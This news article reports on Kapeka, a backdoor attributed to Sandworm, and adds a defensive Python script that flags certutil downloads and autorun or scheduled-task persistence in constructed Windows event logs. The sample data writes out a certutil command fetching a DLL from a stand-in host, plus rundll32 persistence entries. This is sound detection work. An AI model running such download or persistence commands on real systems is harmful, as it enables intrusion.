Kapeka, a previously undisclosed “flexible” backdoor, has been “sporadically” observed in cyber operations targeting Eastern European countries, including Estonia and Ukraine, since at least mid-2022.
The findings come from WithSecure, a Finnish cybersecurity company, which attributes the malware to the advanced persistent threat (APT) group known as Sandworm (also tracked as APT44 and Seashell Blizzard). Microsoft tracks the same malware under the name KnuckleTouch.
“The malware […] is a flexible backdoor with all the necessary functionalities to serve as an early-stage toolkit for its operators, and also to provide long-term access to the victim estate,” said Mohammad Kazem Hassan Nejad, a security researcher. “The malware is also designed to provide prolonged access to the victim estate.”
Kapeka’s dropper is designed to launch the backdoor component on the infected host and then remove itself once that is done. If the process has SYSTEM rights, the dropper is also responsible for establishing persistence for the backdoor, either as a scheduled task or as an autorun registry entry, depending on the circumstances.
In its own advisory, published in February 2024, Microsoft described Kapeka as involved in multiple campaigns distributing ransomware, and stated that it can be used to steal credentials and other data, carry out destructive attacks, and give threat actors remote access to the device.
The backdoor is a Windows dynamic-link library (DLL) written in C++. It carries an embedded command-and-control (C2) configuration used to establish communication with an actor-controlled server, and it also stores how frequently that server should be polled for commands.
Besides disguising itself as a Microsoft Word add-in to appear legitimate, the backdoor DLL collects information about the compromised host and uses multi-threading to receive incoming instructions, execute them, and send the execution results back to the C2 server.
“The backdoor uses WinHttp 5.1 COM interface (winhttpcom.dll) to implement its network communication component,” Nejad described in detail. The backdoor communicates with its C2 to poll for tasks and to send back fingerprinting information and task results; data in both directions is exchanged as JSON.
While polling, the implant can receive an updated C2 configuration from the C2 server, which lets it change its C2 configuration on the fly. Its primary functions include reading and writing files from and to disk, launching payloads, executing shell commands, and upgrading or uninstalling itself.
At this point, the specific mechanism by which the malware is spread is not known. Microsoft, however, noted that the dropper is retrieved from compromised websites using the certutil utility, highlighting the use of a legitimate living-off-the-land binary (LOLBin) to orchestrate the intrusion.
Kapeka’s connections to Sandworm rest on conceptual and configuration overlaps with previously documented families such as GreyEnergy and Prestige, which are assessed to be successors to the BlackEnergy toolkit.
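The two host-level behaviours described above, the certutil-based retrieval of the dropper and the persistence it sets up as a scheduled task or autorun registry entry, are what a defender can look for in endpoint telemetry. The following triage script is an added example, not code from WithSecure or Microsoft; the event records are constructed in the shape of Sysmon Event ID 1 (process create), Sysmon Event ID 13 (registry value set) and Windows Security Event 4698 (scheduled task created), and the paths, host name and task name in them are hypothetical.

```python
import re

# Constructed sample telemetry (not real data). Field names follow the
# Sysmon / Windows Security schemas; values are invented for this example.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://dropper-host.invalid/w.dll C:\Users\Public\w.dll"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -verify C:\certs\server.cer"},  # legitimate use, must not fire
    {"EventID": 13, "Image": r"C:\Users\Public\dropper.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\WordAddin",
     "Details": r"rundll32.exe C:\Users\Public\w.dll,#1"},
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\WordAddin",
     "TaskContent": r"<Command>rundll32.exe</Command><Arguments>C:\Users\Public\w.dll,#1</Arguments>"},
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "TaskContent": r"<Command>%windir%\system32\defrag.exe</Command>"},  # benign, must not fire
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
AUTORUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\(Users|ProgramData)\\", re.IGNORECASE)


def triage(events):
    """Return (rule_name, detail) pairs for records matching the three behaviours."""
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 1:
            image = ev.get("Image", "").lower()
            cmd = ev.get("CommandLine", "")
            # certutil fetching content from a URL is the LOLBin download pattern
            if image.endswith("\\certutil.exe") and (URL_RE.search(cmd) or "-urlcache" in cmd.lower()):
                findings.append(("certutil_download", cmd))
        elif eid == 13:
            # any value written under a Run / RunOnce key is an autorun persistence candidate
            target = ev.get("TargetObject", "")
            if AUTORUN_KEY_RE.search(target):
                findings.append(("autorun_registry_set", f"{target} -> {ev.get('Details', '')}"))
        elif eid == 4698:
            # a new scheduled task whose action lives in a user-writable directory
            content = ev.get("TaskContent", "")
            if USER_WRITABLE_RE.search(content):
                findings.append(("scheduled_task_created", f"{ev.get('TaskName', '')}: {content}"))
    return findings


if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

The heuristics are deliberately coarse (certutil with a URL, any Run-key write, any task pointing into a user-writable path); in production they would be scoped to the environment's known-good baselines.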
“It is likely that Kapeka was used in intrusions that led to the deployment of Prestige ransomware in late 2022,” according to WithSecure. “It is probable that Kapeka is a successor to GreyEnergy, which itself was likely a replacement for BlackEnergy in Sandworm’s arsenal.”
“The backdoor’s victimology, infrequent sightings, and level of stealth and sophistication indicate APT-level activity, highly likely of Russian origin.”